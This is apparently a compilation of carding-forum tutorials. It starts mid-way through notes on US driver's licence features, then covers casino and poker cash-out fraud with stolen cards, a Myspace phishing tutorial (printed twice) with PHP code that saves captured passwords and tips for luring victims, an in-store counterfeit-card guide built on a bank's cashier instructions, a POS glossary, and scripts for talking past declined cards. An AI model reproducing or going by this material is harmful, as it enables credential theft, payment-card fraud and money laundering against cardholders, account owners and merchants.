license number is the Social Security number or an assigned number of K and 8 digits. +The license is valid for 6 years for drivers between the ages of 21 and 64, which expires on their birthday, +with a 2-year early renewal option, beginning January 1998. Before that date, licenses are valid for 4 +years. Beginning July 1995, out-of-state licenses can be extended up to 6 months. The operator's +minimum age is 14, which is restricted until 16. +This license is a laminated photo-ID with the state seal in front in the data area. Two signatures overlap +the photo. There are a couple of tricks: Those under 21 have red backgrounds in the photos. The letters +"KANSAS" are repeated on the laminate. +Kentucky: +This license is photographic and encased in plastic. The older issue features a repetitive pattern of +"KENTUCKY" across the data area, and the current issue has a running horse as part of the state name. +The prior issue has "CDL LIC" or "CDL LICENSE" printed above the photo. The current issue license +shows "CDL" in the license type area. +The Minor's license has "UNDER 21" in blue on the sides of the laminate, and "UNDER 21" above the +photo. The prior issue has blue bars at the top and bottom in the laminate, and the same words on the +back. +The current issue has a large ghost seal and a stylized laminate, plus a vertical signature at the left side of +the photo. The prior issue has a state seal above the data area, and the signature and camera number +overlapping the photo edges. +The license number is a 9-character number beginning with a letter (usually the first initial of the last +name), then the 2-digit year the license was issued, and then a sequence of 6 numbers. Before November +1996, this number was not hyphenated. Before November of 1995, the Social Security number or an +assigned 9 or 10-digit number was used. +The license is valid for 4 years for drivers age 21 and over, expiring on the last day of the birth month. +For those under 21, it is valid for up to 5 years, but it expires 30 days after the driver's 21st birthday. + +Online Casinos Explained +This article is written exclusively for the beginners and cannot be considered as a ideal description of +earning money from online casinos +1. Selecting a Casino (finding a poker site) +I would advise beginners to start by searching poker websites. You will become an expert by typing in the +following phrases such as Poker, Casino, Slot or Texas hold ‘em on search engines such as Google, +Yahoo. +When you finally complete your search, compile a list of online casinos and start by examining them all. +You will need to first register accounts on the online casinos that you have chosen from your search. +Enter any registration data and then proceed to the category, Deposit/Withdrawal. Here we can see which +types of money can be deposited and withdrawn on this specific casino site. It is important to focus on the +credit card deposit, fortunately almost every online casino this type of depositing money. The reason for +online casinos accepting credit cards as a method of depositing money is simple; it is convenient, easy +and is well saturated because of the high usage of credit/debit cards. Take a look at the method of +withdrawing money. The most popular methods will be Money Bookers, Click2pay, Neteller, Credit Card +and a few other payment accounts and systems. Webmoney is the least used system of money withdrawal, +try to guess why ) +So, when you have chosen an online casino we will continue our guide with all the mentioned above +parameters. Now we are interested in the limits on the first deposit. The bigger the limit is, the better for +us. Still, I would not advise you on starting to work with online casinos such as Go Play of the B2B net, +because here the limit of the first deposit will it reach the maximum at 20 dollars. Usually almost all +casinos have high limit, which exceed that sum that we will deposit. I would like to note that anti-fraud +policies of the online casino affects all the rooms on this site – which means that if one of the room blocks +you from depositing or withdrawing money or asks you for scans or calls you, it is better to leave this +online casino, as it will make life difficult. +2. Depositing (Depositing using cvv) +Remember that you will probably not be able to use American cards on your online casino that you have +selected, because Americans are prohibited from gambling online. However an alternative solution is to +buy EU cc or one from the UK, although cards from Italy, France or Germany are the best to use. When +you have got you valid cc – we can definitely get started. +We should follow the standard registration procedure. Enter in all the cardholder’s information. After you +have entered in one valid e-mail addresses, you will receive a email link to verify this online casino +account, once you have clicked the link in the email, you have completed the e-mail verification and will +have completed registration. If you have not logged in to the account now is the time to login. We are +interested in the balance growth. Click on the methods of deposit and in our case, the method is credit +card. Copy all the data and enter it into the correct text fields. Usually the page will ask you to enter the +CC number, First and Last name, Card expiry date and CVV code, which is the last 3 digits on the back +of a credit card (if its Visa or MasterCard. It will ask you to enter the amount you wish to deposit. (I +Strongly recommend you on setting the amount within the range of 200-700 dollars, depending on the +online casino and card type). One important thing – Remember to set the card’s type, If it is a Visa then +the CC number will begin with a 4 or 6, if it is a MasterCard it will start with a 5. +Click on the Submit button and wait until the data processing is complete. If the deposit was not +successful, you should not get upset – everything comes with experience. There could be several reasons +as to why this has happened: either the bank did not authorize this transaction, the card has exceeded the +limit for that day or that the card does not have enough funds. Alternatively the site may not allow the cc +processing of a particular bank. After a short period of time you will make your own BIN-base of the +cards that you can deposit successfully. So let’s move on to the next point. +3. Losing to the other person +Here we have reached the important point, in my opinion. There are two parts of a deposit. +a. Lose +The idea is to lose the money in this account to your partners. your partner should have a clear account on +this online casino. On this account a deposit should be made, and on this account all the money won will + +be added. You choose one room in the poker site and start the game. It will most probably be the Texas +hold ‘em poker game. +I will describe the game rules in another topic. I have experience playing poker this is why I am planning +to write up articles on the game nuances. +During the game you should realistically lose your staked money. You know your opponents cards and on +your mutual decision you make a stake or pass – as a result of it on the river you should have a winning +combination, you hand should be really strong respectfully to the strength of the combination of your +partner. The possibility of bluff is not excluded too. For example if you hand is a little weaker in this case +you have a pair of JJ and you opponent has a pair of QQ 0 in this case if you make bet/raise (stake the +sum or raise it) on the sum of ? of your bank or higher till the stake ‘all in’ a stake for all the dibs) you +will get a pot (bank). Naturally all the game goes according to the wishes and desires of your partner, +there should be harmony in your actions in order to escape unneeded situations. +I will not get into the details of the game’s nuances when there are other people playing in the same room, +I will just describe shortly one of the main and important tactics. You and your opponent take seats close +to each other. Somebody among you both (it will be better if its yourself – because It is easier to lose +somebody’s money) regularly and aggressively lays and stakes his money on the preflop – the first step of +the game, it is there when the cards should be divided among the players in a clockwise fashion, starting +from the player called BigBlaind). Doing this he sorts or even makes people discard their cards. The bid +sum should not be very small or very big. I think that it will be convenient to make a first bid of the sum +of 10BB. Still everything depends on the style of playing of the other player, on their general amount and +on the cards you have. +That’s all; I have already described a first method…then we will take a closer look to each of them. +B) Go on playing +This method requires professionalism and special knowledge of the game itself, and it will not be +convenient for the beginners. +The sense is to win the game-actually; this aim has every player of the room. When you have already won +some certain sum of money you make a withdrawal on the card you have previously made a deposit on, +you set the same amount of money you had at the beginning of your game. One problem can arise – every +Casino asks you to make the first withdrawal to the same place (card or some system) where you had your +first deposit. Moreover the sum of money withdrawed should be equal to those of the deposit. The rest of +the money, won by you, can be transferred to other systems by every possible means. +Here probably you will have a question, why should not I play honestly and win the money, if I can +simply use my own budget and then be free to choose the way of its withdrawal escaping other +impediments? It is not so pitifully – to lose somebody’s money and not your own. Having lost all the +deposit you will lose your maximum – your time and material, which costs lower and much lower than +the previous option Benefit is obvious here. + +Paypal Cvv +carding +Two accs from this site http://poker.betfair.com one with the emal adress of the pp you want to cash out +and one with your real data. make sure that u have verified the real acc to withdraw your money from this +site(i lost 250 on research for this tut ) before u transfer big sums two acc where suspended from me. +after you know everything works u only need 2 ip addy one for the real name acc and one for the acc u +want to cash out i suggest to use rdp for the other one. +now u can meet on an empty and start transfer the money (750 max). make a small show than it wont be +suspect 4 the admin. + +Phishing +Tutorial +Hello carders, maybe someone will find this usefull! enjoy +1. Intro +There are couple of other phishing tutorials around here, but some people seem to have problems +understanding them. So I'll try to be as simple as possible. This phishing tutorial is written for newbs, and +if you have problems understanding it, then you need to get some beginner level computer knowledge +first. +-This article was written for educational purpose only. I'm not responsible for any illegal activity that you +may commit. +2. What is a phisher? +Phisher is something that looks like a login page(a fake login page), that writes the username and the +password to a file, or does whatever you want. +3. How to make one? +All you need is a web hosting service with PHP enabled. +We will use t35. Go to www. t35. com (remove spaces) and sign up for a free account. (whenever I write +something like www. t35. com, you should remove the spaces inbetween. I'm doing it cause the link for +t35 is censored on hackforums.) In this tutorial we will make a phishing site for Myspace(the procedure is +equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his +picture. That will lead you to Myspace's login page that has the red box with"You Must Be Logged-In to +do That!" just above your login form. Now, click File>Save Page As, and save the myspace page to your +Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the +source code), and copy it. +Get back to your t35 account and click on 'New File', delete the text that will be there by default, and +paste the Myspace's source code there. Name the file 'index.php'(without the ''), and save it. +Now you have made a page equal to Myspace. Everything on that page will have the same function as if it +were on the original site. The link to your phish site will be 'www.xxx. t35. com/index.php' - where 'xxx' +is the name of your account(you can name it anyhow. +But there is a little problem. When someone enters his username and password and press login, it logs +him into the real myspace. +What do we need to change? +What we need to change is the action of the 'login' button, so instead of logging them into the real site, it +writes the username and password to a text file. +Open your 'index.php' file. Search in the code for keywords 'action='. +There will be several 'action=some link' in the myspace's source code(for the sign in button, search +button, etc.). We need to find the 'action=some link' that refers to the Login button. +After some searching, we find the: +Code: +
+Member Login +
+
+
+ +
+and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the +login button. +Change: +action="http://secure.myspace.com/index.cfm?fuseaction=login.process" +To: +action="login.php" +and save the file. +Formerly, when you click the login button it would take the values in the username and password boxes, +and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process' file. +Now when you click the login button it will take the values in the username in password boxes, and +execute the functions in the 'login.php' file on your site(which doesn't exist yet). +All we have to do now, is to create a 'login.php' file that contains a function that writes down the +username and password into a text document. +Make another file named 'login.php'(without the quotes) and paste the following code in it: +Code: + $value) { +fwrite($handle, $variable); +fwrite($handle, "="); +fwrite($handle, $value); +fwrite($handle, "\r\n"); +} +fwrite($handle, "\r\n"); +fclose($handle); +exit; +?> +The function of login.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't +already exist) and enter the informations there(the username and password). +Congratulations! You have a phisher!Superman +The link to your phish site is: +http://xxx. t35. com/index.php -where 'xxx' is your account name. +The link to your text file is: +http://xxx. t35. com/passwords.txt +Or you may access it from your account. +Note that you can choose whatever names you like for index.php, login.php and passwords.txt. but the +.php and .txt must stay the same. +4. How to trick people to fall for it. +There are billions of ways how to do it, your creativity is your limit. +Most common way is to make an email similar to the admin, and sending them some report with a link to +log in the site(your phish site). Ofcourse you will mask the link. +How to mask the link? +If you're posting it on forums, or anywhere where bb code is enabled, you're doing this: +Code: +TheOriginalSiteLink +For example, Google looks like a google, but it leads you to yahoo when you click it. + +If you're making the phisher for myspace, and want to get random ppl to it, you can simply make some +hot chick account and put some hot pic that will lead to your phish site when clicked. So when they click +the lusty image, they will be led to your phish site telling them they need to log in to see that.Hehe +Like this: +Code: +link%20of%20the%20image +When sending emails see for the option 'hyperlink', and it's self explainable once you see it. +There are many other ways, and as I said, your creativity is the limit. +5. Outro +I hope that this tutorial was helpful and simple enough. It explains how to make a phisher, and how it +works. Although is written for Myspace, the procedure is equivalent for almost every other login site(for +hotmail is different). After this, it's up to you to explore, experiment and dive in the world of social +engineering +Phishing tut +Hello carders, maybe someone will find this usefull! enjoy +1. Intro +There are couple of other phishing tutorials around here, but some people seem to have problems +understanding them. So I'll try to be as simple as possible. This phishing tutorial is written for newbs, and +if you have problems understanding it, then you need to get some beginner level computer knowledge +first. +-This article was written for educational purpose only. I'm not responsible for any illegal activity that you +may commit. +2. What is a phisher? +Phisher is something that looks like a login page(a fake login page), that writes the username and the +password to a file, or does whatever you want. +3. How to make one? +All you need is a web hosting service with PHP enabled. +We will use t35. Go to www. t35. com (remove spaces) and sign up for a free account. (whenever I write +something like www. t35. com, you should remove the spaces inbetween. I'm doing it cause the link for +t35 is censored on hackforums.) In this tutorial we will make a phishing site for Myspace(the procedure is +equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his +picture. That will lead you to Myspace's login page that has the red box with"You Must Be Logged-In to +do That!" just above your login form. Now, click File>Save Page As, and save the myspace page to your +Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the +source code), and copy it. +Get back to your t35 account and click on 'New File', delete the text that will be there by default, and +paste the Myspace's source code there. Name the file 'index.php'(without the ''), and save it. +Now you have made a page equal to Myspace. Everything on that page will have the same function as if it +were on the original site. The link to your phish site will be 'www.xxx. t35. com/index.php' - where 'xxx' +is the name of your account(you can name it anyhow. +But there is a little problem. When someone enters his username and password and press login, it logs +him into the real myspace. +What do we need to change? +What we need to change is the action of the 'login' button, so instead of logging them into the real site, it +writes the username and password to a text file. + +Open your 'index.php' file. Search in the code for keywords 'action='. +There will be several 'action=some link' in the myspace's source code(for the sign in button, search +button, etc.). We need to find the 'action=some link' that refers to the Login button. +After some searching, we find the: +Code: +
+Member Login +
+ +
+ +
+and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the +login button. +Change: +action="http://secure.myspace.com/index.cfm?fuseaction=login.process" +To: +action="login.php" +and save the file. +Formerly, when you click the login button it would take the values in the username and password boxes, +and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process' file. +Now when you click the login button it will take the values in the username in password boxes, and +execute the functions in the 'login.php' file on your site(which doesn't exist yet). +All we have to do now, is to create a 'login.php' file that contains a function that writes down the +username and password into a text document. +Make another file named 'login.php'(without the quotes) and paste the following code in it: +Code: + $value) { +fwrite($handle, $variable); +fwrite($handle, "="); +fwrite($handle, $value); +fwrite($handle, "\r\n"); +} +fwrite($handle, "\r\n"); +fclose($handle); +exit; +?> +The function of login.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't +already exist) and enter the informations there(the username and password). +Congratulations! You have a phisher!Superman +The link to your phish site is: +http://xxx. t35. com/index.php -where 'xxx' is your account name. +The link to your text file is: +http://xxx. t35. com/passwords.txt + +Or you may access it from your account. +Note that you can choose whatever names you like for index.php, login.php and passwords.txt. but the +.php and .txt must stay the same. +4. How to trick people to fall for it. +There are billions of ways how to do it, your creativity is your limit. +Most common way is to make an email similar to the admin, and sending them some report with a link to +log in the site(your phish site). Ofcourse you will mask the link. +How to mask the link? +If you're posting it on forums, or anywhere where bb code is enabled, you're doing this: +Code: +TheOriginalSiteLink +For example, Google looks like a google, but it leads you to yahoo when you click it. +If you're making the phisher for myspace, and want to get random ppl to it, you can simply make some +hot chick account and put some hot pic that will lead to your phish site when clicked. So when they click +the lusty image, they will be led to your phish site telling them they need to log in to see that.Hehe +Like this: +Code: +link%20of%20the%20image +When sending emails see for the option 'hyperlink', and it's self explainable once you see it. +There are many other ways, and as I said, your creativity is the limit. +5. Outro +I hope that this tutorial was helpful and simple enough. It explains how to make a phisher, and how it +works. Although is written for Myspace, the procedure is equivalent for almost every other login site(for +hotmail is different). After this, it's up to you to explore, experiment and dive in the world of social +engineering +Poker manual. Part1 – carding +Countries: +Best: ES, FR, DE, AU, IT, FI. (possible deposit withdraw, acceptance of lots of bins) +Where can be problems: US, CA, UK. ( USA and CA don’t accept gambling money, UK cards are dying +quick and can have too little balance or SMS-alerts); +Some rooms which accept USA CC: +SportsBook Poker +PlayersOnly Poker +Carbon Poker +Poker Stars +Bodog Poker +Only Poker +Super Book Poker +Full Tilt + +And etc. +Accept the room your USA CC or don’t depends of BIN, more exactly – from the bank. USA is only for +beginners and for “loosing”. +Europe is better because you can use any data instead of holder’s name, address etc. All you need are card +number, exp and cvv. Ipoker’s rooms check any information before sending to merchant. It’s often helps +to contact with support. +Always check on valid your card before carding. ClickAndBuy.com -> New… +If you see that limit in the room is less than $600 – better look for another room of this poker net. It’s +possible that you’ll find the room with bigger limit. +If your account is automatically locked after you’ve made the deposit – use payment systems. You can +card any payment system where uses CC for uploading funds. I advise you to use moneybookers. It still +cards good. Either directly from CC or through merchant (you’ll have to accept SMS in the appropriate +country or use the card with VBV or MCSC – in this way you don’t have to accept SMS) +Also there are some exotic systems for carding like clickandbuy etc. but it’s not for public. Payment +systems are ALWAYS better for “loosing”. But there’re not good for cashing out. +What to do after money are deposited? – Read in the next article. Fraud inside the room +Poker manual. Part 2 – fraud inside the room +So we already have an account with money. Further we can: +- bet and win till $2000 on balance and: +1) sell for 10-20% from balance (deposit without withdraw 15-20%. To withdraw is possible only on Visa +CCs which were made not in USA). Maximum profit from account is about $400. +2) “lose” won money to a clean account (“lose” carded money is already not good idea). Today is actual +loosing in DoN (double or nothing) and timplay of expencive tournaments with less than 100 players (you +should have a least three carded accounts). Holdem on NL100-NL400 is almost dead so it’s not worth it if +it isn’t “standard” working limits of clean accounts. Also you can lose from carded account till some +“trust limit’ (it’s made by security service of the room and usually $20-$100) and withdraw on fresh- +registered account – it’s stable profit for people who don’t wait “jack-pots” and just want to work and +earn. Profit from $500. +3) Give for cashing out. Profit to $1000. +4) Make a deposit by yourself and withdraw (moneybookers, neteller, webmoney etc). Account in +payment system should be made with the same info (country, name, addres) which you used during +registration of poker account. Then make transfer to account for cashing out with linked credit card or +bank account. +- do the direct transfer to clean account BUT you mustn’t order a withdraw on clean one! There are a lot +of rooms where transfers work. In 90% won money are transferred without documents and shiet like this. +I advise you to use one more account between carded and clean Till they will lock and investigate the +chain your chances of success are growing. +- if you made deposit on promoted account (account with big history of playing and transactions) then +you can win come money and right after that withdraw the money to the account where you’ve already +made withdraw. Security service will start to work only after “fraud notification”. You can also make a +deposit from CC on your own clean account from cards of another countries and payment systems’ +accounts. Sometimes you’ll be lucky and your clean accounts will present you for about $1000 a week. +For example in Titan was verified account with documents and some cashouts which lived without locks +for about a month and there were some “dirty” deposits through MB merchant (read the first article if you +don’t understand what I’m talking about), play “for vision” and made withdraw on WebMoney. I’ve got a + +lot of points and I decided to order a bonus – but security servise got up and locked the account explained +that I had no permission to take this bonus. +Similar situation was in PS and FTP where deposits were made with good CC on promoted accounts. +Then withdraws were ordered. +Now poker is dead for people which just want to press a couple of buttons and don’t invent any new +ways. There are always enough bugs in different rooms – just you must be able to find and use it. Soon +I’ll write the third part of poker manual – cashing out. +POS-Cashier Job Explained +So, You have decided to work with real plastic bought from Zeusk. You got the cards, that virtually do +not differ from the real ones, document, confirming the identity of a citizen of the country where the card +was issued; the magnetic stripe contains the name, same as in Your documents. +And, of course, You are dressed in accordance with the sum which you wish to spend (like, on a diamond +for Your another mistress, so when looking at this trifle, she recalled You). But there is a little problem, - +You know that in fact, the card is Not Yours. And for You to feel more confident in this situation, You +should know how the cashier works, and what is prescribed for him by an official instruction. +If you want to know this, - read this article: All about the Work of a POS-cashier. And You’ll be in a +more favorable position hereafter: You will know any action of the cashier, but he will nothing about +You. +BANK INSTRUCTION FOR A POS-CASHIER (OPERATOR) +Bank card (further, - card) is a property of a bank issuer and can be used for the purchase of goods, or +withdrawal of cash, only by a legal cardholder. His name is indicated on the front (exterior) side of the +card, and example of his signature is located on the signature panel; also, the data presented by a +cardholder must correspond with the data on card. +The card cannot be transferred by its legal holder to the third person for use, in any circumstances. +Illegal operation with the card means: its usage or attempt to use the card on someone’s name, use of +counterfeit card, or the counterfeit of the card itself, use of fraudulently received blanks of Slips and Slips +of other enterprise, plotting additional symbols/records to the imprint of the card; counterfeit of the Slip, +the use of white plastic with incused or coded data from the original card on the magnetic stripe (so- +called, white plastic), writing uncollected code from the Authorization Center into the Slip, and also, +illegal use of the card by its lawful holder. +When receiving cards, follow the current instruction, which will ensure your financial safety. +1. Check the period of validity +2. Make sure that the card complies with International standards, and its use is not limited by a country or +a region, shown on the card (for instance: ‘Valid only in..’) +3. Make sure that the card is undamaged +4. Make sure that there are no signs of counterfeit of the card +5. Check the presence of signature on the panel for a signature, without a signature, the card is not +serviceable. +6. Make sure that the signature on the slip/bill conforms to the example on the card. + +7. Make sure that the data on the slip/bill conforms to the data of presented card: their discrepancy is +possible in a case of counterfeit of a magnetic stripe (Buy my dumps! US Only; VISA/MC etc). +I. The Major features of counterfeit cards VISA and EUROCARD/MASTERCARD, most commonly +encountered at the moment, and the methods of their revelation. +1. Hologram (Volumetric Image). The hologram on the fake cards can play with all colors of the +spectrum, but the ‘volume’ is absent. The background of a real hologram is clear, images are easily +recognizable and detailed. The background of a fake hologram is dull, and the image is not sharp. Fake +hologram often exfoliates (‘bubbles’), if pressed on the front surface, and bended the card in the hologram +area. The foil with image of the forged hologram is easily lifted with a nail. A real hologram does not +bubble when bending the card, doesn’t have thickenings or bulges, and cant be damaged when attempting +to pull it off with a nail. +2. Signature panel. A stripe of a white paper is glued instead of a panel for signature. The edges of a panel +are easily lifted. The background with 3-color inscription ‘MasterCard’ (EURO cards), or blue/3-color +VISA, is absent in some cases. +3. Lamination. The front (facial) side of the card, and sometimes, the backside, can be covered with a +transparent tape, - laminate. Laminating tape flakes away on the edges; rarely, the hologram and +embossing area do not fit tightly to the plastic. +4. BIN of a bank-issuer. The first 4 digits from the number of a card (account), duplicated with the paint +(usually black), can rub away from the card. On the real card, it is impossible to erase the bin. +5. Logotype. VISA logo colors differ from the original, and can be wiped off the card. +6. Microprint. Microprint in the area around the logotype is virtually unreadable, and can be easily wiped +off the card. +7. Stylized symbols. Symbols ‘V’ and ‘MC’ are made roughly and differ from the original. +8. UV-symbols. In UV-light, the image of a flying dove or letters ‘MC’, in EURO case, can be absent. +9. Magnetic stripe. The data of the magnetic stripe does not conform to embossing. +10. Side area of the card is dark, instead of being white. +II. Conducting authorization +Because of the safety, the POS-cashier is required to carry out electronic part of authorization via a POS- +terminal, in the first place. In a case of refusal of fulfillment of the purchase, a report ‘REFUSAL, +N’(where N is a code of refusal; see the codes below) appears on the screen of a POS, no voice +authorization, or card service should be done. A cashier should recommend a client to contact the bank- +issuer. +Voice authorization can be carried out only in the case of no- or broken connection with a Processing +Center (the screen of POS should show ‘ERROR CONNECTION’ or ‘ERROR SETTING’). +III. Specifics of Behavior of Card Presenters that Should Cause the Caution of a Cashier +1. Slow, uncertain writing on a slip/bill of a POS-terminal +2. Unnatural, nervous behavior, excessive talkativeness, attempts to speed-up the registration of a +transaction. + +3. Disparity of appearance and name of the holder, shown on card; for instance, in case of presentation of +the card on a name of a citizen of a country of Latin America or South Africa, by a person with European +appearance. +4. The card is taken from the pocket, not the wallet. +5. Aspiration to buy anything, without selecting, of any size etc. +6. Desire to deliver independently all large-size products (PC, Fridge, etc), despite the offered delivery +service. +IV. Actions of a cashier, in case of rising doubts about originality of a card, or that the card is presented +by its real holder. +1. Define the identity of card-presenter, asking to show identity-verification documents; identify the photo +in a document and make sure that there are no signs of photo-exchange in a document (re-glued photo). +2. Write down the data from the document on a bill, or make a copy of a document. +In case of doubts about the legality of usage of a presented card, and at the same time, absence of +confidence in refusal of service, it should be offered to pay with another card. +V. Actions of a cashier, in case of revelation of counterfeit card, or illegal holder. +After the ascertainment of the fact of using the card on other’s name or forged card, or after the receipt of +authorization command ‘Pick Up’, it is required: +1. To register the slip/bill +2. To give a presenter to sign it +3. Ask top show the passport or other identity-proofing document and write its data on a slip. +4. If necessary, the special signal during the authorization request can be used - ‘CODE 10’;. +Authorization center operator will inform and call a police to the enterprise. +Take measures to detention of a fraudster with the help of security guards of your enterprise. +Call the police using 911. +5. Register the arrest protocol, and if a policeman is up to take the slip and the card as evidence, - register +an official protocol about the seizure of these documents. +6. Write down the data about the person, arrived at the detention, his position and work phone number. +7. Inform the policeman about an attempt of illegal use of a card, information will be transferred to CC +Fraud Department. +8. Inform the bank-issuer security service about the accident. +9. Compose an accompanying letter, which should contain information about who seized the card, card +number, duration, and a name of a holder. +10. During 3 working days, send a seized card to the bank with accompanying letter. +VI. Foundations for the seizure of a card from a cardholder +1. Presence of obvious features of counterfeit of a card. (see: features of fake cards) +2. Forged magnetic stripe (discrepancy between the data from the magnetic stripe with the data, embossed +on a card). +3. Presentation of a card on other’s name (different from the name of presenter), disparity of signature on +a card with one on the identity-verification documents. +4. Receipt of a ‘PICK UP’ directive from AC. +5. The card has serious damage (broken, cut, pressed with an iron, embossing is unreadable) +VII. The Documents that Can Be Accepted By POS-Cashiers As Identity-Attesting Documents +Identity of a citizen of a country, is verified by a passport of a citizen. The forged cards are usually +supplied with fake foreign passports. +Identity of a foreigner can be defined by his national passport, accreditation card of a diplomat, journalist, + +and businessman. +In all cases when you ask for the document, write down the data from a document to a bill. +VIII. Actions, Forbidden with the Slips/Bills +1. Double rolling +2. Making changes into 2 left copies of a slip +3. Usage of a ‘white plastic’ for making a slip +4. Transfer of slip blanks to other persons +IX. Specifics of card processing when working with POS-terminal +It is obligatory to compare the number, embossed on the card, with a number on a bill. +ATTENTION! Seized, or found card is required for the transfer to its legal owner - bank-issuer in a 3-day +term. Bank guarantees a REWARD for seizure of the card from illegal circulation. +X. POS CODES You wish to know. +[color=orange:240601002d]Code Name +00 Approved Successful transaction +01 Refer to Card Issuer Call to AC +02 Refer to Card Issuer, special condition Call to AC +03 Invalid Merchant Call to AC +04 Pick up card Seize a card, Call to AC +05 Do not honor Refusal +06 Error Call to AC +07 Pick up card, special condition Seize a card, Call to AC +08 Honor with identification Call to AC +09 Request in progress Call to AC +10 Approval for partial amount Call to AC +11 Approved VIP Call to AC +12 Invalid Transaction Call to AC +13 Invalid Amount Incorrect Amount +14 Invalid card number Incorrect card number +19 Re-enter transaction Recurring Transaction (copy) +21 No action taken Call to AC +30 Format Error Call to AC +41 Lost card Pick up Lost Card ; Seize a card, Call to AC +43 Stolen card Pick up Stolen Card; Seize a card, Call to AC +51 Not sufficient funds Insufficient Funds +52 No checking account Refusal +53 No savings account Refusal +54 Expired card Expired card. Refusal. +55 Pin incorrect Incorrect PIN code. Refusal +57 Transaction not allowed for cardholder Refusal +58 Transaction not allowed for merchant Current card type is not serviceable. Refusal +61 Exceeds withdrawal amount limit Spending Limit Exceeded Refusal +62 Restricted card Forbidden Card. Refusal +63 Security violation Call to AC +65 Activity count limit exceeded Refusal +75 Pin tries exceeded Wrong PIN counter overflow. Refusal. +76 Unable to locate previous Call to AC +77 Inconsistent with original Call to AC +78 No account Call to AC + +80 Invalid transaction date Call to AC +81 Cryptographic PIN error Call to AC +84 Pre-authorization time to great Call to AC +86 Cannot verify PIN Call to AC +89 MAC error Incorrect MAC-code. Call to AC +91 Issuer unavailable Bank-issuer is not available +92 Invalid receiving institution id Call to AC +93 Transaction violates law Illegal Transaction +94 Duplicate transaction Recurring Transaction +96 System malfunction Call to AC[/color:240601002d] +POS Explained (words) +Account +A category used to group financial information and to create financial statements for a business. Accounts +are typically represented by an account number. A well-defined chart of accounts is essential for good +financial records. +Accounting interface +A method of transferring distributions and vouchered receivings from retail softwareto an accounting +software package. +Accounts payable +Amounts owed to others (a liability) for goods or services purchased on credit. +Accounts receivable +Amounts owed to a business (an asset), usually by customers who purchased goods or services on credit. +Adjustment +An increase or decrease to the quantity indicated in the retail software package. The adjustment ensures +that the records in the retail software match the actual physical quantity in inventory. + +Additional markdown +An increase of a previous markdown to further lower the selling price. +Address Verification Service (AVS) +A service that reduces credit card fraud by verifying the cardholder's address information when the +physical card isn't available to swipe through an MSR device (e.g., as with telephone orders). AVS +processing doesn't affect whether the charge is approved. Instead, AVS indicates whether or not the +address provided by the customer matches the address on file with the credit card company so that the +merchant can decide whether or not to process the charge. +Aging +A process that determines the age (number of days old) of customer open items. +Allocated purchase order +A purchase order that includes goods intended for delivery to multiple locations. Items ordered with an +allocated purchase order can be shipped to a single location, and then transferred to their final locations, +or they may be shipped to each individual location from the vendor. +Alphanumeric +Consisting of letters, numbers, and/or special symbols (*, &, $, etc.) in any combination. +Alternate unit +Represents a secondary unit of measure for receiving or selling an item. For example, the stocking unit +for an item might be 'each,' but you might receive an item by the alternate unit 'case.' +Audit trail +A method of tracking transactions through the entire sequence of their history so that all financial +information can be traced. Certain reports should be printed or stored electronically in the retail software +as part of the business's permanent records. +Authorization +The act of ensuring the cardholder has adequate funds available against his or her line of credit. If + +authorized, an authorization code will be generated and adequate funds are set aside. The cardholder's +available credit limit will be reduced by the authorized amount. +Authorization code (Approval code) +A code typically consisting of numbers which is given when a credit card transaction is authorized. +Available quantity +The quantity of an item that is currently available for sale. Generally, the available quantity is equal to the +on-hand quantity minus any quantities set aside for open orders. +Average cost +An accounting cost method achieved by calculating or recalculating a weighted average of the cost of all +inventory items currently in stock. This cost is recalculated each time items are added to the inventory, +and in certain situations, when items are removed +B2B (Business-to-Business) +Business model focused on sales to other businesses. Manufacturers, wholesalers, and suppliers are +typical B2B companies. +B2C (Business-to-Consumer) +Business model focused on sales to consumers. Retailers are typical B2C companies. +B2G (Business-to-Government) +Business model focused on sales to national, state, or local government agencies. +Backorder +A type of order normally created when there is insufficient quantity available for a sale or order. +Balance sheet inventory account +An account that tracks the value of on-hand inventory. +Barcode + +A unique identifier for an inventory item or for a particular color/size combination for an item. A barcode +may be printed in machine readable format using one of a number of common symbologies, such as UPC- +A, Code 39, etc. +Batch processing +A processing model for entering several transactions in sequence, then finalizing (or posting) all of these +transactions at the same time. Batch processing allows multiple employees to enter and edit the same +types of transactions simultaneously in their retail software. +Bill of Lading (BOL) +A shipping document that serves as evidence that the carrier received shipment and as a contract between +carrier and shipper. +Bin +Represents a physical place to store inventory. Bins are subdivisions of a location and are used to locate +items. Generally, bins refer to physical rows/shelves or to actual bins. +Biometric +A measurable characteristic or unique trait, such as a fingerprint, used to recognize the identity of a +person. Biometric devices can be used with retail point of sale systems as a secure log in mechanism. +Black Friday +The day after Thanksgiving. While Black Friday is often thought of as the busiest retail shopping day of +the year, in fact the busiest retail shopping day of the year is usually the Saturday before Christmas. +The origin of the term Black Friday comes from the shift in profitability during the holiday season. Black +Friday marks the day when many retailers shift from being unprofitable, or "in the red," to being +profitable, or "in the black." +Buyer +An executive who is responsible for selecting, pricing, and purchasing merchandise. In many companies, +the term "buyer" designates a department manager, whose responsibilities include, but are broader than, +the purchasing function. + +Responding to Declines when carding instore +Clever responses to declines +1. Nice +" That happened to me once before i may be over my limit for the day... well gimme that one back (your +right stick hand out to psychologically pressure them to give it back) and try this one" (get card back) +"well I guess my wife/husband/girlfriend/boyfriend/friends monkeys uncles cousin has it. Leave this here +for 5 minutes ill be right back. +2. Logical +"I had the same problem earlier and when i called they said it has something to do with the cards they sent +out when i got mine... there sending me another one but said it depended on what type of terminal the +retailer uses.... ill just wait till i get the new card and come back later (under breathe.. "god dammit +motherfucking piece of shit HELL") (smile and leave) +3. Annoyed +"you?ve got to be kidding me! After ALL the hassle ive been through with those damned credit card +people and NOW this AGAIN!!! Just gimme the damn card back im gonna cancel the damn thing and +then ill be back dammit (sound angry and use damn alot)" +4. Paranoid and bipolar +"OH NO!!! SOMEONE HAS BEEN USING MY CARD!!! OH MY GOD WHAT AM I GONNA DO!!! +GIMME THAT BACK ITS PROBABLY ONE OF YOUR EMPLOYEES 